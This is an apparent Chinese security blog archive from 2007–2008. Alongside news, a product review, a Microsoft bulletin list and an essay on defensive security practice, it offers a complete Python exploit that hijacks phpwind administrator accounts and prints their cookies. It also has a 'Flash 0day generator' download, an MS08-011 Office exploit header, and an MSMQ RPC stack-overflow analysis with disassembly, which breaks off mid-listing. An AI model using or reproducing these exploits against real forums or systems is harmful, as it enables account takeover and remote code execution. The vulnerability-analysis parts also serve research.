It's My Life

卡巴斯基征集力量破解高加密敲诈病毒

Mon, 16 Jun 2008 12:51:47 +0000

近日,卡巴斯基实验室宣布启动名为“Stop Gpcode”的全球主动对抗敲诈病毒计划,此次主动防御的目标是破解病毒Virus.Win32.Gpcode.ak中运用的RSA1024位密钥,该病毒是危险的敲诈病毒——Gpcode的最新版本.Virus.Win32.Gpcode.ak的特征码已于2008年6月4日添加到卡巴斯基实验室反病毒数据库中.

据悉,Virus.Win32.Gpcode.ak是Gpcode病毒的一个新变种.不同版本的Gpcode病毒能够使用不同密钥长度的RSA强加密算法加密用户各种类型的文件(如:.doc、.txt、.pdf、.xls、.jpg、. png、.cpp、.h等).一旦在计算机中加密文件以后,病毒会自动生成一条信息通知用户文件已被加密,并要求用户付款购买解密程序.而新衍生的 Gpcode.ak使用了1024位的RSA加密算法拉进行加密,能够在受害的设备中加密文件后会添加一个._CRYPT的扩展名,同时在同一个文件夹中放置一个名为!_READ_ME_!.txt的文本文件.打开该文本后,犯罪分子会告诉受害者文件已被加密并向其兜售解码器.

目前,被 Gpcode.ak加密的文件还不能被解密,不仅由于其密码的位数增至1024位还因为在其文件的执行中未找到任何差错.因此,就目前的情况来看,解密这些加密文件的唯一办法就是使用只有编写者才有的的私钥.据估计,如果加密算法正确执行,一台具有2.2 Ghz处理器的PC机需要用上大约30年的时间来破解一个660位的密钥.Gpcode的编写者花了两年的时间来改进此病毒:之前的差错得以修补,并且将密码的位数从660位增加至1024位.

卡巴斯基实验室的病毒分析师们通过深入的密钥分析,能够对该类病毒使用的私钥进行破解,使得卡巴斯基实验室成功地发现并防御了Gpcode的各类早期变种.到目前为止,卡巴斯基实验室的病毒研究员已经能够破解长达660位的密钥.然而,该病毒的新版本Virus.Win32.Gpcode.ak采用了一个1024位的密钥.而破解RSA1024位的密钥是一个极其复杂的密码学问题.

卡巴斯基实验室诚邀各位密码学专家、政府研究机构、研究所、其他反病毒厂商以及独立研究人员一起努力来解决这个问题.卡巴斯基实验室已经做好准备为愿意参加到“Stop Gpcode”计划中来的各位专家提供有关处理情况的额外信息,并展开开放式的对话.实验室已拥有关于此病毒的充分信息来帮助各位专家展开破解RSA密钥的工作.

欲配合参与到此次活动的各位人士可以访问我们为此次活动专门创建的“Stop Gpcode”论坛,网址为:http://forum.kaspersky.com/index.php?showforum=90.

如果您的计算机遇到上述被感染的情况,我们建议您使用其他连接互联网的计算机联系我们.请记住不要重启或关闭疑似感染的设备.请将邮件发送stopgpcode@kaspersky.com,并请在邮件中列出以下信息:

感染的日期&时间

设备被感染前5分钟的所有操作,包括:执行过的程序、访问过的网站

卡巴斯基实验室会尽力帮助您恢复任何被加密的数据.

K1 World Max 2008-Yasuhiro Kido vs. Chi Bin Lim

Fri, 06 Jun 2008 09:54:21 +0000

小日本拳王的正顶膝，很猛!小日本这些年在自由搏击项目上取得的成就，有目共睹啊

phpwind管理权限泄露漏洞利用程序

Fri, 06 Jun 2008 09:46:58 +0000

Python代码

1. # -*- coding: gb2312 -*-
2. import urllib2,httplib,sys
3. httplib.HTTPConnection.debuglevel = 1
4. cookies = urllib2.HTTPCookieProcessor()
5. opener = urllib2.build_opener(cookies)
6.
7.
8. def banner():
9. print ""
10. print "########################################################"
11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
12. print "Copyright (C) 2006"
13. print "jianxin@80sec.com"
14. print "80sec是一个新的致力于web安全的小团体"
15. print "http://www.80sec.com"
16. [separator]
17. def usage():
18. banner()
19. print "Usage:\n"
20. print " $ ./phpwind.py pwforumurl usertoattack\n"
21. print " pwforumurl 目标论坛地址如http://www.80sec.com/"
22. print " usertoattack 目标拥有权限的斑竹或管理员"
23. print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
24. print " 最新版本可以使用uid登陆"
25. print " 其他版本可以使用cookie+useragent登陆"
26. print "########################################################"
27. print ""
28.
29.
30. argvs=sys.argv
31. usage()
32.
33.
34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
35. pwurl = "%s/register.php" % argvs[1]
36.
37. request = urllib2.Request(
38. url = pwurl ,
39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
40. data = data)
41.
42. f=opener.open(request)
43. headers=f.headers.dict
44. cookie=headers["set-cookie"]
45. try:
46. if cookie.index('winduser'):
47. print "Exploit Success!"
48. print "Login with uid password @80sec or Cookie:"
49. print cookie
50. print "User-agent: 80sec owned this"
51. except:
52. print "Error! http://www.80sec.com"
53. print "Connect root#80sec.com"

Flash 0day生成器

Fri, 06 Jun 2008 09:44:25 +0000

下载地址：flash0day.rar

安全幻想曲2008 (PST By axis)

Tue, 25 Mar 2008 12:11:57 +0000

Ph4nt0m Security Team的webzine第一期的序言 PST webzine第一期下载见附件

                      ==Ph4nt0m Security Team==

                       Issue 0x01, Phile #0x04 of 0x06

|=---------------------------------------------------------------------------=|
|=----------------------=[  安全幻想曲2008 ]=---------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=--------------------=[      By axis             ]=--------------------=|
|=--------------------=[   ]=---=|
|=---------------------------------------------------------------------------=|

    我见过的大多数安全人员，都对技术有着一种狂热，甚至是一种偏执。这种情绪在做安
全研究员的时候是非常有好处的，因为作为研究员，可能要偏执考虑到一些极端的情况。这
种钻研精神，是光靠勤奋所无法达到的。但是在甲方做安全的话，可能更多时候需要的就不
是狂热，而是掌握平衡的艺术。在商业利益与安全性发生冲突时，如何处理好这个平衡，是一
个关键。

    举一个简单的例子来说，眼下最流行的XSS攻击，其修补方案从总体上来说，大致可以分
为escape output和filter input两种。对于狂热的安全人员来说，当然是恨不得把网站全
部弄成静态的，输出都采用escape output，全部输出纯文本，就天下太平了。然而现实与理
想总是有差别的，首道难关就是网站肯定会有些富文本的需求。

    当安全和需求相抵触时，一定是安全给商业需求让路。这里要避免一个误区，就是安全
应该是为需求而服务的，而不是成为需求的障碍。其实这个观点大多数人都心知肚明，但是
在实际操作起来的时候往往会事与愿违。

    再回到富文本上来，当需求决定需要有富文本输出的时候，狂热的安全人员（下称为狂战
士吧）就只好退而求其次，要求对富文本做filter input，对其他没有富文本的地方做escape
output。接下来问题来了，对于程序员来说，富文本往往采用了一些第三方的，或者是基于第
三方的富文本编辑器，还有的是自己实现了一个。而这些富文本编辑器，往往在考虑
xss defense的时候有所欠缺。这时候采用什么样的策略来做filter input，就成为了新的
问题。

    第一个难关就是程序员会拉上商业，一起来和狂战士PK，说filter input很容易误杀客
户的正常操作，还会影响到性能。当然这小小的难关还难不倒狂战士。狂战士往往会轻蔑的
一笑，然后把风险推到商业上，说出了问题让他背黑锅之类。这种狠话一放出来，商业往往就
会退缩了，毕竟狂战士这么个狠角色是摆在那里的。所以最后会决定让程序员去整filter。

    于是程序员简单写了个基于正则的blacklist，并且禁用了部分标签，比如script。狂战
士这时候又蹦了出来，对程序员指手画脚，要求禁用style，因为这玩意太难控制了，黑客有几
百种利用style的方式；狂战士还说，基于正则的匹配这个魔法等级太低了，要换个高级魔法，
比如个语法分析器，类似html purify这种，还要有log analysis和realtime monitor功能。

    一般到了这个时候，程序员对狂战士的忍耐已经差不多到极限了，因为甲方网站很少以
安全为主要考核因素，没人会认为一个视频网站或者是交友网站的安全需要做的比FBI更好，
因为没那么大的成本投入。于是程序员说要释放这么个高级魔法需要一个团的程序员配合，
还需要召唤很长时间才能放出来，所以狂战士的这个非常牛B的魔法无法完成。而一般在这
个时候，程序员往往会用啥性能和稳定性之类的因素来忽悠狂战士，说这种魔法一般有一定
概率会反噬，没整好就把自己整残了。

    狂战士无奈之下，只好同意程序员实现一部分的魔法，filter部分过滤完整有效就行了。
做好这个之后，狂战士还让程序员去对没有富文本需求的地方使用escape output。程序员
这时候对狂战士已经忍无可忍了，因为由于以前从来没有注意过xss这方面的问题，所以需要
escape的地方是以“千”或者是“万”为单位的，多如牛毛。于是程序员开始消极怠工，并且开
始诉苦。这条路走不通了，狂战士只好开始寻求更好的方案。

    后来狂战士回家睡了一觉，在梦中有仙人传授武艺，于是马上想到了新的办法。第一招
是filter output，不过这个扯淡的方法根本属于yy，因为对服务器压力太大。第二招是使用
WAF，就是web application firewall，开个虚拟补丁，这样程序员不补也能搞定web漏洞。不
过这样就依赖于WAF的规则了，而且治标不治本。看来昨晚那个仙人估计是灶君一类低级的
小神，尽出馊点子。看来狂战士还得继续和程序员PK下去了。

    可以见到，那些牛圈里的狂战士常认为是“奇技淫巧”的XSS问题里，有这么多头疼的问题。
简单的问题变得越来越复杂。

    安全是一个持续的过程（process）。既然是过程，就会有第一步、第二步 ... 第N步，有
一个持续的概念在里面，不能今天整了，明天就不管了。今天的安全并不代表明天的安全，新
的技术和应用在不断发展，就会不断带来新的问题。经常看到一个升级反而把漏洞升级出来
的例子。所以安全是一个持续的对抗过程，hacking与anti-hacking的过程，广义来说，更是
一个弱化风险的过程。

    很多BOSS往往都会这么问狂战士：我上了这个720安全卫士是不是桌面安全就不用管了？
我上了这个卖红茶IPS是不是就能挡住所有刺客入侵了？狂战士这时候很无奈的说：不行，还
是有很多trojan和rootkit可以bypass主动防御，很多shellcode和0day可以anti IPS。于
是BOSS很生气的说：那我花这么多钱买这个做啥？狂战士一般会忽悠他说：上了这个可以解
决90%的攻击。于是BOSS会很不满意，让狂战士出技术分析报告，一定要有充分的理由才行，
狂战士往往要面对这种烦恼。

    其实BOSS的这种观点是一种急功近利的想法，没有认识到安全是一个过程，并且是一个
持续改进的过程。不是买个box就能解决问题的。没有100%的安全，有漏洞的地方太多了。
经常有魔法师用木桶原理来阐述安全问题，但其实很多时候，连木板在哪里，到底那块木板才
是短板，都没有一个很清晰的认识，因为很多时候根本无法量化，所以狂战士的工作经常陷入
误区。板子太多了，系统、网络、用户、应用、数据、桌面......

    放眼看去，全是短板，每块板子都能让刺客或盗贼轻松的进来，偷走核心数据或者弄摊网
站然后扬长而去。或者各种短板互相组合，让问题变得更加扑朔迷离。

    前面说的WAF就是一种比较功利的做法，虽然厂商经常会蹦出来说这玩意是需要有专人
维护的，也是一个持续的过程。但实际上很多购买WAF的用户都没有好好的去做这个过程。
其实WAF、IPS最大的软肋不是在没人跟进上，而是在于其是串联的网络上的，特别是开了虚
拟补丁的阻断模式的时候。这对于高可用性的应用来说，绝对是无法忍受的。没人敢背这个
误杀的黑锅。要是因此导致了PV下降，可能老板就要喊到办公室去喝茶了。不过WAF也不是
完全没用，如果能够用好的话，对于网站还是还是很有帮助的，至少在monitor和攻击流量分
析上起着积极的意义。不过前提是用好。

    刚才说了安全是一个过程(Process)，其实有人跟进这个过程还不够，下面还要重点说说
深度防御的思想。经常看到YY小说的作者在写到黑客攻防的时候，说到XXX在xx分钟内就突
破了N道防火墙，N大于100；变形金刚里也这么有这种场景。其实这纯粹是扯淡，没事整那么
多防火墙做什么，无端影响了可用性。不过YY作者深度防御的理念还是正确的，只是他不知
道那玩意不应该单纯叫防火墙，要想表达这个思想，可以整个专业名词，比如：多层防御体系。
这样装B就可以装的比较像样了。举例来说，可以在应用层校验用户输入数据，DB层面检查每
条sql，操作系统上细分权限，服务最少化，网络上防御arp spoof，加密传输通道，做好ACL…类
似措施还有很多，防御的方案交叉层叠起来，就能起来一个比较好的保护效果。

    不过偏偏还有不识趣的，比如前面的很多程序员都会说，我都已经做了filter input，还
要escape output做啥。狂战士一般听到后会有想要狂化的冲动。按耐住狂化，告诉程序员，
说filter input可能会做不干净，会被bypass，毕竟如果遇到一个手执绝世0day(bypass
filter)的9级刺客，什么牛B的防御魔法都挡不住，所以能escape output的地方，最好escape
掉，这样最干净。可是即便是这样做好了，还是有些会有很难处理和发现的地方，比如在DOM
里的XSS，比如在JS里面一些写的很BT的地方，等。这些只能靠肉眼去看了。PK还得进行下去。

    但是程序员还是不能很好的理解，他们跑出来说：我这里做了完善的access control，只
有管理员才看的到，这里就算有注射有跨站就随他去了，不需要修复。想偷这种懒的人其实
不在少数。这种想法违背了深度防御的思想。先姑且不论如果管理员密码泄露，或者管理员
是个内鬼的情况。如果刺客通过注射拿到了管理员密码，或者是直接通过XSS和CSRF来对后
台进行注射，那么前面的access control就完全没作用了。

    在一定程度上，是可以容忍风险的存在的，但是从长期来看，这种做法是非常不可取的。
比如有的管理员会说防火墙只允许80端口，那么RPC漏洞或开其他端口的应用漏洞是否就可
以不补了。也许一时来说是没什么问题，但是如果放置不管将导致没有人来维护漏洞，也许
哪天的防火墙策略变更，或者来自内部系统的威胁，都有可能导致当时看起来无害的漏洞被
利用。而这种做法的一个后果往往是难以检查原因，就是说咋死的都不知道。所以这又回到
了开始的话题：安全是一个持续的过程。

    在灌输完深度防御的思想给程序员以后，狂战士又被另外一种程序员打击到崩溃了。面
对满目都是红色的扫描报告，他们说:我这个xxx ftp没漏洞，除非狂战士可以证明黑客能搞
进来拿到shell。一般狂战士听到这种要求，狂化的概率在80%以上。首先，不是只有能拿到
shell的才叫漏洞。一个dos可能会造成业务的中断，一个infomation leak可能会为后续攻
击带来便利，等等。

    面对scan report以及CVE查询出来的漏洞，大部分都是没有现成的exp能够利用的，而且
要利用漏洞可能有各种苛刻的条件，比如要求本地交互shell啊，或者要求有帐户之类。而更
多的时候，漏洞根本连细节的都没有，只有一个漏洞公告里一个简单的划分critical，标红。
就算有exp，可能还要考虑到exp的稳定性和成功率、语言版本啥的，打过去也不一定能成功。
更何况狂战士无法处心积虑了为了POC给程序员看，而花费大量的精力来追求一个可能没有
结果的漏洞。

    但是无法POC不代表就没有风险了。我们的目标是要保证一个系统长期的在任何情况下
都能安全运行，机密数据不会外泄，业务不会中断。所以这种程序员犯的错误就是偷换了概
念，把威胁范围缩小了，用个体来代替全局。很多时候威胁可能来自内部，可能来自误操作，
可能来自其他的风险。要说服这种程序员很辛苦，只能够靠长期的“忽悠”，来慢慢感化他们，
要是运气好还能做出一两个POC来震撼下他们，刘震撼(ZhenHan.Liu)就是为此而生的。佛曰：
我不下地狱谁下地狱。

    作为一个优秀的狂战士，往往要有相当程度的mission impossible的修为。很多时候，
需要为浏览器漏洞、操作系统漏洞擦屁股，不然最后吃亏的还是自己的用户。面对钓鱼和诈
骗，很多时候那些认为web安全是“奇技淫巧”狂战士们认为解决方案是impossible的，认为
no patch for stupid。比如phishing，诚然，如果有一个一劳永逸的方案，那么这种完美魔
法要是放出来了绝对可以获得圣阶魔导师的称号。但是YY归YY，现实归现实。狂战士们很头
疼这种问题，但是却不得不去面对它。

    魔法最终还是放出来了，可惜不完美。目前anti-phishing的魔法，有整到浏览器里内置
对抗的(IE7/8)，也有浏览器toolbar、扩展的，有在IM里做过滤的，还有穷举malicious sites
的，更有发动人民战争来维护一个blacklist的，其难度和成本从低到高什么都有，不过基本
都无法一次性解决问题。比较有创意的魔法属于yahoo发明的sign seal，基于认证机器的原
理来识别真实网站，不过这个方法的缺陷在于需要长期教育用户，实际使用效果不一定好。
yahoo还整了个domainkey技术来在邮件里对抗phishing，不过这个缺陷更明显，需要邮件服
务商支持。yahoo的狂战士挺有想法的，就是太理想化了一点。

    说到安全世界的另外一股强大力量不能不提教廷，这个宗教从精神上统治了安全世界，
一群群红衣主教们整出来了一堆标准、规范比如BS7799之类来帮助狂战士们更好的忽悠他
们的BOSS。其实标准是死的，主教们的出发点是好的，不过这些标准啥的就和秘籍差不多，狂
战士们以为他们读明白了，其实很少人真正读懂了。那玩意如果拿来忽悠BOSS们确实是一套
套的，但用在实处则有一个本地化的过程。必须要把标准之类的东西和实际情况结合起来，
不然就只能停留在忽悠的层面上。

    最能体现问题的出在编码规范上。可能有N个权威的机构都出了他们自己的code规范，
或者某些狂战士佣兵团（安全公司）也自己整了套。不过在具体使用的时候，很多狂战士都是
拿了一套去用在所有的公司身上，其实这样的结果就是到最后没有程序员遵守用那玩意，因
为在实际情况中往往不好用。每个公司都有自己的体系、环境和编码习惯。系统的designer
和architect只要不是小白一般都或多或少的会考虑点安全风险，规范只有本地化以后才能
很好的用起来，不然绝对会水土不服。所以要是再遇到什么安全公司拿标准、规范来忽悠的
时候，狂战士们就要睁亮了眼睛了！

    胡侃瞎吹了这么多其实也没说到重点，不过重点已经不是本文要讲的事情了，想要讲的
东西还有很多，也许以后会陆续写出来。狂战士是份很好的职业，希望有更多的狂战士甚至
是半兽人朋友能够加入我所在的狂战士佣兵团！

-EOF-

点击这里下载文件

百度Hi聊天工具内测报告。先睹为快

Sun, 02 Mar 2008 02:41:59 +0000

百度HI功能：
百度Hi是一款集文字消息、音视频通话、文件传输等功能的即时通讯软件，通过它您可以方便地找到志同道合的朋友，并随时与好友联络感情。

百度好友：预先导入百度好友，并随时与他们对话。
第一次登录百度Hi时，系统会自动导入您的百度空间好友。
待对方使用百度Hi后，您就可以与他们即时沟通了！

兴趣搜人：不管多少种爱好，Hi都能找到与您志趣相投的人。
您可以通过兴趣爱好、血型、星座等多种组合找到与您最投机的朋友，与他们分享、交流！
只需点击主面板下方的“找朋友”打开“搜人”页面，按照提示操作即可。

兴趣群组：轻松加入或创建兴趣群组，聚合您的同趣好友。
您是否为召集一次帖吧聚会而烦恼？百度Hi兴趣群组为志同道合的吧友们提供了一个广泛交流、畅所欲言的场所。
您可以同时参加20个群组，每个群组支持多达256个成员！无论您有多少种兴趣爱好，总能找到合适的群组。

百度空间：一键进入您的百度空间，即时提醒好友空间更新。
点击主面板上的空间图标，无需重新登录，即可进入您的空间首页。
如果联系人头像左侧出现，那一定是好友的空间更新拉，这可是抢沙发的利器哦！

密友排行：可按联络频繁度对好友排序，您的“密友”一目了然。
研究表明，平日里与您经常联系的人数不超过20个。您是否为在众多联系人中找到这20个“密友”而痛苦？在百度Hi中选择“按联系频度排序”，与您联系最频繁的好友便一目了然！

邮箱登录：记不住用户名？常用的电子邮件地址也可以登录。
您是否为申请过众多网络帐号而遭遇记忆烦恼？开通“邮件地址登录”功能，就可以使用最常用的电子邮件地址登录百度Hi了。

加图：

BaiduHi 1.0 Beta1已经开始提供下载,该软件版本只供安装体验,暂不允许外部用户注册使用!

http://dl.pconline.com.cn/html_2/1/92/id=49478&pn=0.html

新浪科技今日获得内测版“百度HI”的界面图片，并通过首批参与内测的百度人士获得一份最新鲜的百度Hi使用感受。据介绍，百度Hi具备了IM工具的所有常用功能，且与百度其他产品实现融合。

　　据透露，百度Hi支持直接用百度ID直接登录，最多支持1000个好友，支持视频和语音聊天功能，可以建立群组、多人聊天、传送大文件，还可以和贴吧、知道、空间的好友进行联络。

　　此外，百度Hi面板结合了百度搜索功能，还具备了“找朋友”功能。综合看出，百度Hi产品的定位是为打通、互联百度各款产品，满足其社区用户需求。(全智)

　　附，百度人士小结几点“百度Hi”使用心得。

　　1、百度Hi主界面及对话框设计简洁，没有弹出广告，有专门皮肤下载页。

　　2、支持passport式ID，非QQ那种号码式，直接用百度ID就可以登录，也可以选择关联邮箱。

　　3、百度Hi最多支持1000个好友。

　　4、可以建立群组、可以多人聊天、可以传送大文件。

　　5、可以和贴吧、知道、空间的好友进行联络。

　　6、面板结合了百度搜索，支持网页搜索、图片搜索、MP3搜索等。

　　7、具备了“找朋友”功能。

　　8、像QQ一样支持多帐号登录。

雪中的家园

Sat, 16 Feb 2008 12:19:05 +0000

MS08-011 EXP (test)

Fri, 15 Feb 2008 12:17:48 +0000

Microsoft Office .WPS File Stack Overflow Exploit (MS08-011)

[code]/*
* Copyright (c) 2008 chujwamwdupe - pumpernikiel.c
*
* one day in teletubby land...
*
* an email from idefense:
*
* "Unfortunately, Microsoft has refused to credit you using the name you requested."
*
* ...what's wrong with 'chujwamwdupe', eh?
*
*
* Description:
*    A vulnerability exists in WPS to RTF convert filter that is part
*    of Microsoft Office 2003. It could be exploited by remote attacker
*    to take complete control of an affected system. This issue is due to
*    stack overflow error in function that read secions from WPS file.
*    When we change size of for example TEXT section to number langer than
*    0x10, stack overflow occurs - very easy to exploit.
*
*
* Tested on:
*    Microsoft Windows XP Service Pack 2 && Microsoft Office 2003
*
* Usage:
*     wps.exe 1 evil.wps
*
*/

............

微软二月安全公告发布

Fri, 15 Feb 2008 12:08:11 +0000

一共有 11 个，其中 6 个严重级别，5 个重要级别。

严重级别的有：

MS08-007
WebDAV Mini-Redirector 中的漏洞可能允许远程执行代码 (946026)
http://www.microsoft.com/china/technet/security/bulletin/ms08-007.mspx

MS08-008
OLE 自动化中的漏洞可能允许远程执行代码 (947890)
http://www.microsoft.com/china/technet/security/bulletin/ms08-008.mspx

MS08-009
Microsoft Word 中的漏洞可能允许远程执行代码 (947077)
http://www.microsoft.com/china/technet/security/bulletin/ms08-009.mspx

MS08-010
Internet Explorer 的累积性安全更新 (944533)
http://www.microsoft.com/china/technet/security/bulletin/ms08-010.mspx

MS08-012
Microsoft Office Publisher 中的漏洞可能允许远程执行代码 (947085)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-012.mspx

MS08-013
Microsoft Office 中的漏洞可能允许远程执行代码 (947108)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-013.mspx

重要级别的有：

MS08-003
Active Directory 中的漏洞可能允许拒绝服务 (946538)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-003.mspx

MS08-004
Windows TCP/IP 中的漏洞可能允许拒绝服务 (946456)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-004.mspx

MS08-005
Internet Information Services 中的漏洞可能允许特权提升 (942831)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-005.mspx

MS08-006
Internet Information Services 中的漏洞可能允许远程执行代码 (942830)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-006.mspx

MS08-011
Microsoft Works 文件转换器中的漏洞可能允许远程执行代码 (947081)
http://www.microsoft.com/china/technet/security/Bulletin/MS08-011.mspx

Microsoft 安全公告摘要（2008 年 2 月）：
http://www.microsoft.com/china/technet/security/bulletin/ms08-feb_sum.mspx

MS07-065 Message Queuing Service RPC远程溢出分析

Mon, 17 Dec 2007 09:51:56 +0000

Author: axis
Date: 2007-12-17
Team: http://www.ph4nt0m.org

微软的补丁链接
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

根据ZDI的漏洞描述:
The specific flaw exists in the RPC interface defined on port 2103 with
UUID fdb3a030-065f-11d1-bb9b-00a024ea5525. During the processing of
opnum 0x06 the service copies user-supplied information into a fixed
length stack buffer. Sending at least 300 bytes will trigger a stack
based buffer overflow due to a vulnerable wcscat() call. Exploitation
of this issue can result in arbitrary code execution.

漏洞是在UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 的第6个调用引起的。最终通过一个 wcscat()的拷贝造成一个栈溢出.

查找了一下关于这个接口的一些定义
http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html

The Message Queuing service (msmq) runs RPC services, listening on the ncacn_ip_tcp transport. By default, the msmq services opens 4 TCP ports [81], including one or several of 2101/tcp, 2103/tcp, 2105/tcp and 2107/tcp.

The mqqm.dll (Windows NT MQ Queue Manager) DLL, loaded in the mqsvc.exe process, contains the following RPC services:

fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0

76d12b80-3467-11d3-91ff-0090272f9ea3 v1.0

1088a980-eae5-11d0-8d9b-00a02453c337 v1.0

5b5b3580-b0e0-11d1-b92d-0060081e87f0 v1.0

41208ee0-e970-11d1-9b9e-00e02c064c39 v1.0

Table 4.49. qmcomm operations

事实上，这个服务运行在2101、2103、2105、2107端口，根据我后来的结果可以看到，这些端口都能够直接溢出

这个漏洞被微软标记为important，因为在2003偷偷修复了，在xp和2000 professional版本上，这个漏洞利用时候需要验证用户密码，只有在2000 server上，才能够无须身份验证的触发溢出。

Windows默认是没有装这个服务的，要安装这个服务可以在添加删除程序里，选择添加windows组件。

如果是英文版的系统，那么这里可能叫做 Message Queuing

安装完之后，可以通过 net start msmq 来启动服务。

服务的进程是 mqsvc.exe, 而服务是在 mqqm.dll 中，所以我们可以反汇编这个dll文件

用IDA反汇编mqqm.dll后，用mida插件逆向出RPC调用

导出IDL文件后，可以看到函数结构如下：

/* opcode: 0x06, address: 0x613B5F03 */

long _QMCreateObjectInternal (
[in] long arg_1,
[in][string] wchar_t * arg_2,
[in][range(0,524288)] long arg_3,
[in][unique][size_is(arg_3)] char * arg_4,
[in][range(1,128)] long arg_5,
[in][size_is(arg_5)] long arg_6[],
[in][size_is(arg_5)] struct struct_4 arg_7[]
);

这个函数结构暂时先不管他，也可以自己重新构造了一个IDL文件.

通过IDA看 _QMCreateObjectInternal 函数，没过多久就看出了问题所在

在 QMCreatePrivateQueue 中的 ReplaceDNSNameWithNetBiosName 中，没有对输入进行充分检查，wcscat()导致了一个栈溢出。

; int __cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z proc near

Str= dword ptr  4
Dest= dword ptr  8

push    esi
push    5Ch             ; Ch
push    [esp+8+Str]     ; Str
call    ds:__imp__wcschr
pop     ecx
mov     esi, eax
pop     ecx
push    ?g_szMachineName@@3PAGA ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscpy
pop     ecx
pop     ecx
push    esi             ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscat           // 溢出
pop     ecx
pop     ecx
pop     esi
retn
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z endp

伪代码：

wchar_t *__cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
{
  wchar_t *v3; // esi@1

  v3 = _wcschr(Str, 0x5Cu);
  _wcscpy(Dest, g_szMachineName);
  return _wcscat(Dest, v3);
}code]

这里我们后面再回过头来看。

那么，函数调用是这样的：

[code]_QMCreateObjectInternal
           |---------------QMCreatePrivateQueue
                             |-------------------ReplaceDNSNameWithNetBiosName

_QMCreateObjectInternal的伪代码为：

signed int __thiscall QMCreateObjectInternal(struct _RTL_CRITICAL_SECTION *this, RPC_BINDING_HANDLE Binding, unsigned int Type, wchar_t *Str, int a5, int a6, int a7, int a8, int a9)
{
  __int32 v10; // edi@6
  __int32 v11; // eax@7
  int v12; // ST18_4@9
  struct _RTL_CRITICAL_SECTION *v13; // [sp+4h] [bp-10h]@1
  int v14; // [sp+10h] [bp-4h]@4

  v13 = this;
  if ( a5 && !a6 )
  {
    LogMsgHR(-1072824314, off_6B27271C, 0x125u);
    return -1072824314;
  }
  v13 = &qmcmd_cs;
  EnterCriticalSection(&qmcmd_cs);
  v14 = 0;
  if ( Type == 1 )
  {
    v12 = 1;
    goto LABEL_14;
  }
  if ( Type == 2 )
  {
    Type = 0;
    v11 = I_RpcBindingInqTransportType(Binding, &Type);
    if ( v11 )
      goto LABEL_20;
    if ( Type == 4 )
    {
      v12 = 0;
LABEL_14:
      v10 = CQPrivate__QMCreatePrivateQueue(Str, a5, a6, a7, a8, a9, v12);
      goto LABEL_15;
    }
    if ( v11 )
LABEL_20:
      LogMsgRPCStatus(v11, off_6B27271C, 0x28u);
    LeaveCriticalSection(&qmcmd_cs);
    return -1072824283;
  }
  v10 = -1072824319;
LABEL_15:
  if ( v10 < 0 )
    LogMsgHR(v10, off_6B27271C, 0x32u);
  LeaveCriticalSection(&qmcmd_cs);
  return v10;
}

============= 这是华丽的分割线 ================

首先要调用到 QMCreatePrivateQueue .

我们看到以下是依次是 _QMCreateObjectInternal的六个参数
Type= dword ptr 0Ch
Str= dword ptr 10h
arg_C= dword ptr 14h
arg_10= dword ptr 18h
arg_14= dword ptr 1Ch
arg_18= dword ptr 20h
arg_1C= dword ptr 24h

看以下代码片段

loc_6B22555B:           ; CCriticalSection qmcmd_cs
mov     esi, offset ?qmcmd_cs@@3VCCriticalSection@@A
push    esi             ; lpCriticalSection
mov     [ebp+var_10], esi
call    ds:__imp__EnterCriticalSection@4 ; EnterCriticalSection(x)
mov     eax, [ebp+Type]
mov     [ebp+var_4], ebx
dec     eax
jz      short loc_6B2255C1

在代码中，如果eax为1，dec eax后条件为真，会跳转到QMCreatePrivateQueue 去执行

而eax是由mov eax, [ebp+Type]传入的

所以要让流程走到QMCreatePrivateQueue
_QMCreateObjectInternal的第一个参数必须是为0x00000001

以下是 QMCreatePrivateQueue的调用

loc_6B2255C3:           ; int
push    [ebp+arg_1C]
mov     ecx, offset ?g_QPrivate@@3VCQPrivate@@A ; CQPrivate g_QPrivate
push    [ebp+arg_18]    ; int
push    [ebp+arg_14]    ; int
push    [ebp+arg_10]    ; int
push    [ebp+arg_C]     ; int
push    [ebp+Str]       ; Str
call    ?QMCreatePrivateQueue@CQPrivate@@QAEJPBGKPAXKQAKQAUtagPROPVARIANT@@H@Z ; CQPrivate::QMCreatePrivateQueue(ushort const *,ulong,void *,ulong,ulong * const,tagPROPVARIANT * const,int)

实际上，我们在后面可以看到，漏洞是由于QMCreatePrivateQueue的第一个参数，也就是_QMCreateObjectInternal的第二个参数所造成的。

进入QMCreatePrivateQueue 之后，我们要调用到 ReplaceDNSNameWithNetBiosName.
以下是代码片段

.text:6B2178A9                 mov     eax, offset sub_6B25BE64
.text:6B2178AE                 call    __EH_prolog
.text:6B2178B3                 sub     esp, 138h
.text:6B2178B9                 push    ebx
.text:6B2178BA                 push    esi
.text:6B2178BB                 mov     esi, [ebp+8]
.text:6B2178BE                 lea     eax, [ebp-1Ch]
.text:6B2178C1                 push    edi
.text:6B2178C2                 push    eax             ; int
.text:6B2178C3                 mov     [ebp-18h], ecx
.text:6B2178C6                 push    esi             ; Source
.text:6B2178C7                 call    ?IsPathnameForLocalMachine@@YAHPBGPAH@Z ; IsPathnameForLocalMachine(ushort const *,int *)
.text:6B2178CC                 xor     ebx, ebx              ; ebx 清0
.text:6B2178CE                 pop     ecx
.text:6B2178CF                 cmp     eax, ebx      ; 比较ispath函数的返回值
.text:6B2178D1                 pop     ecx
